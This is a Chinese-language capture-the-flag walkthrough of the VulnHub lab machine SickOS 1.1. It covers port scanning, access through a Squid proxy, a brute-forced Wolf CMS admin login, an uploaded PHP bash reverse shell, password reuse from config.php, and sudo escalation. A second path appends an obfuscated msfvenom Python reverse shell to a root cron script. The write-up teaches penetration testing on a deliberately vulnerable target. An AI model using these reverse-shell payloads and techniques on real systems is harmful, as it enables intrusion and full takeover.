打靶記錄 SickOS 1.1

sunset2131發表於2024-09-22

https://www.vulnhub.com/entry/sickos-11,132/

主機發現埠掃描

  1. 探測存活主機,136是靶機,因為靶機是我最後新增的

    nmap -sP 192.168.75.0/24
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:36 CST
Nmap scan report for 192.168.75.1
Host is up (0.00038s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00031s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.136
Host is up (0.00049s latency).
MAC Address: 00:0C:29:62:FB:04 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00027s latency).
MAC Address: 00:50:56:F8:B3:1A (VMware)
Nmap scan report for 192.168.75.131
Host is up.

  2. 掃描靶機所有開放埠

    nmap -sT -min-rate 10000 -p- 192.168.75.136 
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
Nmap scan report for 192.168.75.136
Host is up (0.00075s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:62:FB:04 (VMware)

  3. 檢視服務版本以及系統版本

    nmap -sT -min-rate 10000 -p- 192.168.75.136 
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
Nmap scan report for 192.168.75.136
Host is up (0.00075s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:62:FB:04 (VMware)

  4. 使用指令碼掃描漏洞

    nmap -script=vuln -p 22,3128,8080 192.168.75.136 -oA Desktop/test/vuln
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:46 CST
Nmap scan report for 192.168.75.136
Host is up (0.00085s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:62:FB:04 (VMware)

web滲透

  • 只有8080是關閉的,開啟的只有3128 埠執行著squid代理服務和ssh,訪問3128 ,返回

    ERROR
The requested URL could not be retrieved
The following error was encountered while trying to retrieve the URL: /
    Invalid URL
Some aspect of the requested URL is incorrect.
Some possible problems are:
    Missing or incorrect access protocol (should be "http://" or similar)
    Missing hostname
    Illegal double-escape in the URL-Path
    Illegal character in hostname; underscores are not allowed.
Your cache administrator is webmaster.
Generated Sun, 22 Sep 2024 06:03:35 GMT by localhost (squid/3.1.19)

    可知版本是3.1.19 ,因為他是個代理伺服器,所以可能會代理著什麼,可能就是80

  • 因為我的火狐連線著的是burp的代理地址,假如想要再透過代理訪問別的網站並且能抓包的話,就需要設定burp上游代理伺服器

    大概在:network->connection->upstreamserver 把代理地址192.168.75.136:3128 新增上去即可

  • 訪問192.168.75.136 ,頁面有回顯了,那就表示80192.168.75.136:3128 下代理著

    # 內容
BLEHHH!!!

    是個網路用詞

  • 掃描目錄,需要指定代理伺服器

    python .\dirsearch.py -u http://192.168.75.136 --proxy 192.168.75.136:3128
//
[12:15:18] 403 -  243B  - /cgi-bin/
[12:15:19] 200 -  109B  - /connect
[12:15:20] 403 -  239B  - /doc/
[12:15:20] 403 -  242B  - /doc/api/
[12:15:20] 403 -  247B  - /doc/html/index.html
[12:15:20] 403 -  249B  - /doc/en/changes.html
[12:15:20] 403 -  247B  - /doc/stable.version
[12:15:29] 200 -   58B  - /robots.txt
[12:15:30] 403 -  242B  - /server-status
[12:15:30] 403 -  242B  - /server-status/

    發現robots.txt以及connect

    1. connect內容

      #!/usr/bin/python

print "I Try to connect things very frequently\n"
print "You may want to try my services"

    2. robots.txt 內容

      User-agent: *
Disallow: /
Dissalow: /wolfcms

      給我們提示wolfcms

  • 訪問/wolfcms ,是一個內容管理cms,爆破目錄

    python .\dirsearch.py -u http://192.168.75.136/wolfcms --proxy 192.168.75.136:3128
//
[12:18:17] 200 -  403B  - /wolfcms/composer.json
....
[12:18:17] 200 -    4KB - /wolfcms/CONTRIBUTING.md
[12:18:18] 301 -  253B  - /wolfcms/docs  ->  http://192.168.75.136/wolfcms/docs/
[12:18:18] 200 -  512B  - /wolfcms/docs/
[12:18:18] 200 -    2KB - /wolfcms/docs/updating.txt
[12:18:19] 200 -  894B  - /wolfcms/favicon.ico
[12:18:26] 301 -  257B  - /wolfcms/public  ->  http://192.168.75.136/wolfcms/public/
[12:18:26] 200 -  462B  - /wolfcms/public/
[12:18:26] 200 -    2KB - /wolfcms/README.md
[12:18:27] 200 -   20B  - /wolfcms/robots.txt

    發現robots.txt以及readme.md

    訪問後robots.txt 是空的,readme.md 為配置說明

  • 透過查閱得知後臺登陸地址在/wolfcms/?/admin/login

    image

    網路搜尋預設賬號密碼嘗試,登陸失敗

    使用burp進行爆破,指定賬號為admin ,透過密碼字典爆破

    爆破成功,賬號密碼都是 admin

獲得初級shell

  • 登陸進去後尋找可利用點,找到 uploadfile

    fileUploadfile

  • 上傳反彈shell程式碼檔案

    //getshell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.75.131/1234 0>&1'");?>

  • 上傳後點選檔案,回顯檔案儲存在 /public/getshell.php

    image

  • 一步一步嘗試發現檔案在 http://192.168.75.136/wolfcms/public/getshell.php

    kali 開啟監聽

    nc -lvp 1234                                                     
listening on [any] 1234 ...

    訪問 http://192.168.75.136/wolfcms/public/getshell.php

    反彈shell成功

  • 檢視其許可權

    listening on [any] 1234 ...
192.168.75.136: inverse host lookup failed: Unknown host
connect to [192.168.75.131] from (UNKNOWN) [192.168.75.136] 52339
//
www-data@SickOs:/var/www/wolfcms/public$ dpkg -l
...
//
www-data@SickOs:/var/www/wolfcms/public$ sudo -l
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
//
www-data@SickOs:/var/www/wolfcms/public$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux

    許可權不高,系統名是SickOs 核心版本是3.11.0-15

提權

  • 因為wolf是cms,肯定會存在與資料庫連線的檔案,找到config.php 檔案

    cat /var/www/wolfcms/config.php
//
<?php 

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
.....

    發現資料庫使用者名稱為root,密碼為john@123

    改密碼有可能也是系統上某個使用者的密碼

  • 檢視/etc/passwd 尋找可疑使用者

    root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

    發現可疑使用者有 rootwww-databckupsickos

  • 使用可疑使用者進行ssh登入,密碼使用john@123 ,資料庫連結上的密碼

    最後sickos 成功登入

  • 檢視sickos 使用者許可權

    sickos@SickOs:~$ sudo -l
//
[sudo] password for sickos: 
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL

    等於root許可權

  • 讀取flag

    sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~# 
//
root@SickOs:/home# cd /root
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt 
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

另外一種提權思路

  1. 檢視定時任務crontab ,在/etc/cron.d/ 裡面存在一個automate

    內容是

    www-data@SickOs:/etc/cron.d$ cat automate
//
* * * * * root /usr/bin/python /var/www/connect.py

    每分鐘使用root執行connect.py

  2. 可以往connect.py 新增反彈shell程式碼

  3. 生成pypayload程式碼

    msfvenom -p cmd/unix/reverse_python lhost=192.168.75.131 lport=1235 -f raw
//
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 364 bytes
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkM0KwjAQhF8l5JSARJNSf5AcilQQUcH2XmyMtFib0E3fX0Paeuxehtn9dge2/ljTOQRGvbVDCC0Qgr60nVEaIHjz0z3yVRlwEvOdYHy9ZZuY8YjjcejvSC6ieGyADFdZEDK45Ficrmk+ZIVedjuciyy/p8mFTutMmbbVyhHicwPvQ+iEGGDP3goC7FU3ujWEBmo1S/BZQkyElf+PMPVoGoKXZd0uocL0C7l5Vrk=')[0])))

    因為crontab執行的是python檔案,所以不用exec再套一遍python,所以到的就有

    exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkM0KwjAQhF8l5JSARJNSf5AcilQQUcH2XmyMtFib0E3fX0Paeuxehtn9dge2/ljTOQRGvbVDCC0Qgr60nVEaIHjz0z3yVRlwEvOdYHy9ZZuY8YjjcejvSC6ieGyADFdZEDK45Ficrmk+ZIVedjuciyy/p8mFTutMmbbVyhHicwPvQ+iEGGDP3goC7FU3ujWEBmo1S/BZQkyElf+PMPVoGoKXZd0uocL0C7l5Vrk=')[0])))

  4. 把payload重定向到connect.py (connect.py 其實就是滲透階段發現的/connect 目錄裡的內容)

    echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqFkM0KwjAQhF8l5JSARJNSf5AcilQQUcH2XmyMtFib0E3fX0Paeuxehtn9dge2/ljTOQRGvbVDCC0Qgr60nVEaIHjz0z3yVRlwEvOdYHy9ZZuY8YjjcejvSC6ieGyADFdZEDK45Ficrmk+ZIVedjuciyy/p8mFTutMmbbVyhHicwPvQ+iEGGDP3goC7FU3ujWEBmo1S/BZQkyElf+PMPVoGoKXZd0uocL0C7l5Vrk=')[0])))" >> /var/www/connect.py

  5. kali開啟監聽,等待程式碼執行

    獲得root許可權成功

    nc -lvp 1235                                    
listening on [any] 1235 ...
//
192.168.75.136: inverse host lookup failed: Unknown host
connect to [192.168.75.131] from (UNKNOWN) [192.168.75.136] 51066

python -c "import pty;pty.spawn('/bin/bash')"
root@SickOs:~#

相關文章